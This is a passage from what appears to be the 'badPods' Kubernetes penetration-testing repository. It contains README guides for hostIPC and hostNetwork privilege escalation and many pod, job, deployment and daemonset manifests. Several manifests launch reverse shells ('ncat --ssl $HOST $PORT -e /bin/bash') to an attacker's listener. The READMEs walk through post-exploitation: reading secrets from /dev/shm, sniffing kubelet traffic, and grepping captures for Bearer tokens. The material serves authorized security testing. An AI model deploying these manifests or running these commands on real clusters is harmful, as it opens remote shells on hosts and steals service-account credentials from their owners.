`kubectl describe` 45 | 46 | ``` 47 | kubectl describe [RESOURCE_TYPE] hostipc-exec-[RESOURCE_TYPE] 48 | ``` 49 | 50 | ## Reverse shell pods 51 | Create one or more of these resources and catch the reverse shell 52 | 53 | **Step 1: Set up listener** 54 | ```bash 55 | ncat --ssl -vlp 3116 56 | ``` 57 | 58 | **Step 2: Create the pod from the local manifest without modifying it, using env variables and envsubst** 59 | 60 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 61 | * Replace the HOST and PORT values to point the reverse shell to your listener 62 | 63 | ```bash 64 | HOST="10.0.0.1" PORT="3116" envsubst < ./manifests/hostipc/[RESOURCE_TYPE]/hostipc-revshell-[RESOURCE_TYPE].yaml | kubectl apply -f - 65 | ``` 66 | 67 | **Step 3: Catch the shell** 68 | ```bash 69 | $ ncat --ssl -vlp 3116 70 | Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. 71 | Ncat: Listening on :::3116 72 | Ncat: Listening on 0.0.0.0:3116 73 | Connection received on 10.0.0.162 42035 74 | ``` 75 | 76 | ## Deleting resources 77 | You can delete a resource using its manifest, or by name.
Here are some examples: 78 | ``` 79 | kubectl delete [type] [resource-name] 80 | kubectl delete -f manifests/hostipc/pod/hostipc-exec-pod.yaml 81 | kubectl delete -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostipc/pod/hostipc-exec-pod.yaml 82 | kubectl delete pod hostipc-exec-pod 83 | kubectl delete cronjob hostipc-exec-cronjob 84 | ``` 85 | 86 | # Post exploitation 87 | 88 | ## Inspect /dev/shm - Look for any files in this shared memory location 89 | 90 | For a super simple POC, I have created a secret file in /dev/shm on the worker node 91 | ``` 92 | root@k8s-worker:/# echo "secretpassword=BishopFox" > /dev/shm/secretpassword.txt 93 | ``` 94 | 95 | 96 | From the hostIPC pod, we can list all files in /dev/shm 97 | ``` 98 | root@hostipc-exec-pod:/# ls -al /dev/shm/ 99 | total 4 100 | drwxrwxrwt 3 root root 80 Dec 22 15:11 . 101 | drwxr-xr-x 5 root root 360 Dec 21 20:01 .. 102 | drwx------ 4 root root 80 Sep 9 20:10 multipath 103 | -rw-r--r-- 1 root root 25 Dec 22 15:11 secretpassword.txt 104 | ``` 105 | 106 | Check out any interesting files 107 | ``` 108 | root@hostipc-exec-pod:/# cat /dev/shm/secretpassword.txt 109 | secretpassword=BishopFox 110 | ``` 111 | 112 | ## Look for any use of inter-process communication on the host 113 | ```bash 114 | ipcs -a 115 | ``` 116 | 117 | ## Attacks that apply to all pods, even without any special permissions 118 | 119 | **To see these in more detail, head over to [nothing-allowed/README.md](../nothing-allowed)** 120 | 121 | * Access the cloud metadata service 122 | * `Kube-apiserver` or `kubelet` with `anonymous-auth` enabled 123 | * Kubernetes exploits 124 | * Hunting for vulnerable application/services in the cluster 125 | 126 | # Demonstrate impact 127 | If you are performing a penetration test, the end goal is not to gain cluster-admin, but rather to demonstrate the impact of exploitation. Use the access you have gained to accomplish the objectives of the penetration test. 
128 | 129 | # References and further reading: 130 | * https://docs.docker.com/engine/reference/run/#ipc-settings---ipc 131 | * https://opensource.com/article/20/1/inter-process-communication-linux 132 | -------------------------------------------------------------------------------- /manifests/hostipc/cronjob/hostipc-exec-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: hostipc-exec-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | hostIPC: true 15 | containers: 16 | - name: hostipc-exec-cronjob 17 | image: ubuntu 18 | command: [ "/bin/sh", "-c", "--" ] 19 | args: [ "while true; do sleep 30; done;" ] 20 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 21 | restartPolicy: OnFailure 22 | 23 | -------------------------------------------------------------------------------- /manifests/hostipc/cronjob/hostipc-revshell-cronjob.yaml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | apiVersion: batch/v1beta1 8 | kind: CronJob 9 | metadata: 10 | name: hostipc-revshell-cronjob 11 | labels: 12 | app: pentest 13 | spec: 14 | schedule: "*/1 * * * *" 15 | concurrencyPolicy: Forbid 16 | jobTemplate: 17 | spec: 18 | template: 19 | spec: 20 | hostIPC: true 21 | containers: 22 | - name: hostipc-revshell-cronjob 23 | image: raesene/ncat 24 | command: [ "/bin/sh", "-c", "--" ] 25 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | restartPolicy: OnFailure 28 | 29 | -------------------------------------------------------------------------------- /manifests/hostipc/deamonset/hostipc-exec-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: hostipc-exec-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | hostIPC: true 20 | containers: 21 | - name: hostipc-exec-daemonset 22 | image: ubuntu 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "while true; do sleep 30; done;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | 27 | -------------------------------------------------------------------------------- /manifests/hostipc/deamonset/hostipc-revshell-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: hostipc-revshell-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | hostNetwork: true 20 | hostPID: true 21 | hostIPC: true 22 | containers: 23 | - name: hostipc 24 | image: raesene/ncat 25 | command: [ "/bin/sh", "-c", "--" ] 26 | args: [ "ncat --ssl $HOST $PORT -e 
/bin/bash;" ] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 28 | 29 | -------------------------------------------------------------------------------- /manifests/hostipc/deployment/hostipc-exec-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: hostipc-exec-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | hostIPC: true 21 | containers: 22 | - name: hostipc-exec-deployment 23 | image: ubuntu 24 | command: [ "/bin/sh", "-c", "--" ] 25 | args: [ "while true; do sleep 30; done;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | 28 | -------------------------------------------------------------------------------- /manifests/hostipc/deployment/hostipc-revshell-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: hostipc-revshell-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | hostIPC: true 21 | containers: 22 | - name: hostipc 23 | image: raesene/ncat 24 | command: [ "/bin/sh", "-c", "--" ] 25 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | 28 | -------------------------------------------------------------------------------- /manifests/hostipc/job/hostipc-exec-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: hostipc-exec-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | hostIPC: true 12 | containers: 13 | - name: hostipc-exec-job 14 | image: ubuntu 15 | command: [ "/bin/sh", "-c", "--" ] 16 | args: [ "while true; do sleep 30; done;" ] 17 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 18 | restartPolicy: OnFailure 19 | 20 | -------------------------------------------------------------------------------- /manifests/hostipc/job/hostipc-revshell-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: hostipc-revshell-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | hostIPC: true 12 | containers: 13 | - name: hostipc 14 | image: raesene/ncat 15 | command: [ "/bin/sh", "-c", "--" ] 16 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 17 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 18 | restartPolicy: OnFailure 19 | 20 | 
-------------------------------------------------------------------------------- /manifests/hostipc/pod/hostipc-exec-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: hostipc-exec-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | hostIPC: true 9 | containers: 10 | - name: hostipc-pod 11 | image: ubuntu 12 | command: [ "/bin/sh", "-c", "--" ] 13 | args: [ "while true; do sleep 30; done;" ] 14 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 15 | -------------------------------------------------------------------------------- /manifests/hostipc/pod/hostipc-revshell-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: hostipc-revshell-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | hostIPC: true 9 | containers: 10 | - name: hostipc 11 | image: raesene/ncat 12 | command: [ "/bin/sh", "-c", "--" ] 13 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 14 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 15 | -------------------------------------------------------------------------------- /manifests/hostipc/replicaset/hostipc-exec-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: hostipc-exec-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | hostIPC: true 20 | containers: 21 | - name: hostipc-exec-replicaset 22 | image: ubuntu 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "while true; do sleep 30; done;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | 27 | -------------------------------------------------------------------------------- /manifests/hostipc/replicaset/hostipc-revshell-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: hostipc-revshell-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | hostIPC: true 20 | containers: 21 | - name: hostipc 22 | image: raesene/ncat 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | 27 | -------------------------------------------------------------------------------- /manifests/hostipc/replicationcontroller/hostipc-exec-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: hostipc-exec-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | 
app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | hostIPC: true 20 | containers: 21 | - name: hostipc-exec-replicationcontroller 22 | image: ubuntu 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "while true; do sleep 30; done;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | 27 | -------------------------------------------------------------------------------- /manifests/hostipc/replicationcontroller/hostipc-revshell-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: hostipc-revshell-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | hostIPC: true 20 | containers: 21 | - name: hostipc 22 | image: raesene/ncat 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | 27 | -------------------------------------------------------------------------------- /manifests/hostipc/statefulset/hostipc-exec-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: hostipc-exec-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: hostipc-exec-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: hostipc-exec-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | hostIPC: true 36 | containers: 37 | - name: hostipc-exec-statefulset 38 | image: ubuntu 39 | command: [ "/bin/sh", "-c", "--" ] 40 | args: [ "while true; do sleep 30; done;" ] 41 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 42 | -------------------------------------------------------------------------------- /manifests/hostipc/statefulset/hostipc-revshell-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: hostipc-revshell-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: hostipc-revshell-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: hostipc-revshell-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: 
statefulset 34 | spec: 35 | hostIPC: true 36 | containers: 37 | - name: hostipc 38 | image: raesene/ncat 39 | command: [ "/bin/sh", "-c", "--" ] 40 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 41 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 42 | 43 | -------------------------------------------------------------------------------- /manifests/hostnetwork/README.md: -------------------------------------------------------------------------------- 1 | # Bad Pod #6: hostNetwork 2 | ![](../../.github/images/Pod6.jpg) 3 | 4 | If you only have `hostNetwork=true`, you can't get privileged code execution on the host directly, but if you cross your fingers you might still find a path to cluster admin. There are three potential escalation paths: 5 | * **Sniff traffic** - You can use `tcpdump` to sniff unencrypted traffic on any interface on the host. You might get lucky and find `service account` tokens or other sensitive information that is transmitted over unencrypted channels. 6 | * **Access services bound to localhost** - You can also reach services that only listen on the host’s loopback interface or that are otherwise blocked by network policies. These services might turn into a fruitful privilege escalation path (see the sketch below). 7 | * **Bypass network policy** - If a restrictive network policy is applied to the namespace, deploying a pod with `hostNetwork=true` allows you to bypass the restrictions because you are bound to the host's network interfaces, not the pod's.
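As a quick starting point for the localhost path, once you have a shell in a `hostNetwork=true` pod you can enumerate what the node is listening on, including services bound only to 127.0.0.1. A minimal sketch, assuming `ss` (or `netstat`) and `curl` are available in your image; the kubelet port 10250 is just an example target:

```bash
# List TCP listeners on the host's network stack, including 127.0.0.1-only services
ss -tlnp

# Probe anything interesting that other pods can't normally reach
curl -sk https://127.0.0.1:10250/ -o /dev/null -w '%{http_code}\n'
```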
8 | ## Table of Contents 9 | - [Pod creation & access](#pod-creation--access) 10 | - [Exec pods](#exec-pods) 11 | - [Reverse shell pods](#reverse-shell-pods) 12 | - [Deleting resources](#deleting-resources) 13 | - [Post Exploitation](#post-exploitation) 14 | - [Install tcpdump and sniff traffic](#install-tcpdump-and-sniff-traffic) 15 | - [Investigate local services](#investigate-local-services) 16 | - [Attacks that apply to all pods, even without any special permissions](#attacks-that-apply-to-all-pods-even-without-any-special-permissions) 17 | - [Demonstrate impact](#demonstrate-impact) 18 | - [References and further reading:](#references-and-further-reading) 19 | 20 | 21 | # Pod creation & access 22 | 23 | ## Exec pods 24 | Create one or more of these resource types and exec into the pod 25 | 26 | **Pod** 27 | ```bash 28 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostnetwork/pod/hostnetwork-exec-pod.yaml 29 | kubectl exec -it hostnetwork-exec-pod -- bash 30 | ``` 31 | **Job, CronJob, Deployment, StatefulSet, ReplicaSet, ReplicationController, DaemonSet** 32 | 33 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 34 | 35 | ```bash 36 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostnetwork/[RESOURCE_TYPE]/hostnetwork-exec-[RESOURCE_TYPE].yaml 37 | kubectl get pods | grep hostnetwork-exec-[RESOURCE_TYPE] 38 | kubectl exec -it hostnetwork-exec-[RESOURCE_TYPE]-[ID] -- bash 39 | ``` 40 | 41 | *Keep in mind that even if a pod security policy blocks the pod, the parent resource will still be created; the admission controller only blocks the pods that the resource tries to create.* 42 | 43 | To troubleshoot a case where you don't see pods, use `kubectl describe` 44 | 45 | ``` 46 | kubectl describe [RESOURCE_TYPE] hostnetwork-exec-[RESOURCE_TYPE] 47 | ``` 48 | 49 | ## Reverse shell pods 50 | Create one or more of these resources and catch the reverse shell 51 | 52 | **Step 1: Set up listener** 53 | ```bash 54 | ncat --ssl -vlp 3116 55 | ``` 56 | 57 | **Step 2: Create the pod from the local manifest without modifying it, using env variables and envsubst** 58 | 59 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 60 | * Replace the HOST and PORT values to point the reverse shell to your listener 61 | 62 | ```bash 63 | HOST="10.0.0.1" PORT="3116" envsubst < ./manifests/hostnetwork/[RESOURCE_TYPE]/hostnetwork-revshell-[RESOURCE_TYPE].yaml | kubectl apply -f - 64 | ``` 65 | 66 | **Step 3: Catch the shell** 67 | ```bash 68 | $ ncat --ssl -vlp 3116 69 | Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. 70 | Ncat: Listening on :::3116 71 | Ncat: Listening on 0.0.0.0:3116 72 | Connection received on 10.0.0.162 42035 73 | ``` 74 | 75 | ## Deleting resources 76 | You can delete a resource using its manifest, or by name. Here are some examples: 77 | ``` 78 | kubectl delete [type] [resource-name] 79 | kubectl delete -f manifests/hostnetwork/pod/hostnetwork-exec-pod.yaml 80 | kubectl delete -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostnetwork/pod/hostnetwork-exec-pod.yaml 81 | kubectl delete pod hostnetwork-exec-pod 82 | kubectl delete cronjob hostnetwork-exec-cronjob 83 | ``` 84 | 85 | 86 | # Post Exploitation 87 | 88 | ## Install tcpdump and sniff traffic 89 | *If you can't install tools in your pod (no internet access), you will have to change the image in your pod yaml to something that already includes `tcpdump`, like https://hub.docker.com/r/corfr/tcpdump* 90 | 91 | ```bash 92 | apt update && apt -y install tcpdump net-tools netcat 93 | ``` 94 | You now have a few options for next steps: 95 | 96 | **See if the `kubelet` read-only port (10255/tcp) is open on any of the node's IPs** 97 | ```bash 98 | nc -zv 10.0.0.162 10255 99 | Connection to 10.0.0.162 10255 port [tcp/*] succeeded! 100 | nc -zv 172.17.0.1 10255 101 | Connection to 172.17.0.1 10255 port [tcp/*] succeeded! 102 | ``` 103 | 104 | **If the read-only port is open, run `tcpdump`, recording the output to a file for a few minutes** 105 | 106 | **Warning:** Sniffing on an interface with a lot of traffic can cause the interface to DROP traffic, which is not what you want in a production environment. I suggest picking one port at a time for your packet captures (e.g., 10255, 80, 8080, 3000, 25, 23). 107 | **Warning:** Always run `tcpdump` with the `-n` flag. This turns off name resolution; if you don't, the name resolution will bring the capture, and potentially the host, to its knees. 108 | 109 | ```bash 110 | tcpdump -ni [host or docker interface name] -s0 -w kubelet-ro.cap port 10255 111 | ``` 112 | 113 | **Stop the capture and read the file with `tcpdump`. Tip: Use the `-A` flag to show only the printable characters, and hunt for things like tokens with `grep`** 114 | 115 | ```bash 116 | tcpdump -r kubelet-ro.cap -s0 -A 117 | tcpdump -r kubelet-ro.cap -s0 -A | grep Bearer 118 | ``` 119 | 120 | Cross your fingers and look for secrets. If you are lucky, you might even get a JWT.
If you are really lucky, that token might be associated with a service account in `kube-system`. 121 | 122 | 123 | ## Investigate local services 124 | ```bash 125 | curl https://localhost:1234/metrics 126 | ``` 127 | 128 | ## Attacks that apply to all pods, even without any special permissions 129 | * Cloud metadata service 130 | * `Kube-apiserver` or `kubelet` with `anonymous-auth` enabled 131 | * Kubernetes exploits 132 | * Hunting for vulnerable application/services in the cluster 133 | 134 | # Demonstrate impact 135 | 136 | If you are performing a penetration test, the end goal is not to gain cluster-admin, but rather to demonstrate the impact of exploitation. Use the access you have gained to accomplish the objectives of the penetration test. 137 | 138 | # References and further reading: 139 | -------------------------------------------------------------------------------- /manifests/hostnetwork/cronjob/hostnetwork-exec-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: hostnetwork-exec-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | hostNetwork: true 15 | containers: 16 | - name: hostnetwork-exec-cronjob 17 | image: ubuntu 18 | command: [ "/bin/sh", "-c", "--" ] 19 | args: [ "while true; do sleep 30; done;" ] 20 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 21 | restartPolicy: OnFailure 22 | 23 | -------------------------------------------------------------------------------- /manifests/hostnetwork/cronjob/hostnetwork-revshell-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: hostnetwork-revshell-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | hostNetwork: true 15 | containers: 16 | - name: hostnetwork-revshell-cronjob 17 | image: raesene/ncat 18 | command: [ "/bin/sh", "-c", "--" ] 19 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 20 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 21 | restartPolicy: OnFailure 22 | -------------------------------------------------------------------------------- /manifests/hostnetwork/deamonset/hostnetwork-exec-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: hostnetwork-exec-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | hostNetwork: true 20 | containers: 21 | - name: hostnetwork-exec-daemonset 22 | image: ubuntu 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "while true; do sleep 30; done;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | 27 | --------------------------------------------------------------------------------
/manifests/hostnetwork/deamonset/hostnetwork-revshell-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: hostnetwork-revshell-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | hostNetwork: true 20 | containers: 21 | - name: hostnetwork-revshell-daemonset 22 | image: raesene/ncat 23 | command: [ "/bin/sh", "-c", "--" ] 24 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 25 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 26 | 27 | -------------------------------------------------------------------------------- /manifests/hostnetwork/deployment/hostnetwork-exec-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: hostnetwork-exec-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | hostNetwork: true 21 | containers: 22 | - name: hostnetwork-exec-deployment 23 | image: ubuntu 24 | command: [ "/bin/sh", "-c", "--" ] 25 | args: [ "while true; do sleep 30; done;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | 28 | -------------------------------------------------------------------------------- /manifests/hostnetwork/deployment/hostnetwork-revshell-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: hostnetwork-revshell-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | hostNetwork: true 21 | containers: 22 | - name: hostnetwork-revshell-deployment 23 | image: raesene/ncat 24 | command: [ "/bin/sh", "-c", "--" ] 25 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | 28 | -------------------------------------------------------------------------------- /manifests/hostnetwork/job/hostnetwork-exec-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: hostnetwork-exec-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | hostNetwork: true 12 | containers: 13 | - name: hostnetwork-exec-job 14 | image: ubuntu 15 | command: [ "/bin/sh", "-c", "--" ] 16 | args: [ "while true; do sleep 30; done;" ] 17 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 18 | restartPolicy: OnFailure 19 | -------------------------------------------------------------------------------- 
/manifests/hostnetwork/job/hostnetwork-revshell-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: hostnetwork-revshell-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | hostNetwork: true 12 | containers: 13 | - name: hostnetwork-revshell-job 14 | image: raesene/ncat 15 | command: [ "/bin/sh", "-c", "--" ] 16 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 17 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 18 | restartPolicy: OnFailure 19 | -------------------------------------------------------------------------------- /manifests/hostnetwork/pod/hostnetwork-exec-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: hostnetwork-exec-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | hostNetwork: true 9 | containers: 10 | - name: hostnetwork-pod 11 | image: ubuntu 12 | command: [ "/bin/sh", "-c", "--" ] 13 | args: [ "while true; do sleep 30; done;" ] 14 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 15 | 16 | -------------------------------------------------------------------------------- /manifests/hostnetwork/pod/hostnetwork-revshell-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: hostnetwork-revshell-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | hostNetwork: true 9 | containers: 10 | - name: hostnetwork-pod 11 | image: raesene/ncat 12 | command: [ "/bin/sh", "-c", "--" ] 13 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 14 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a 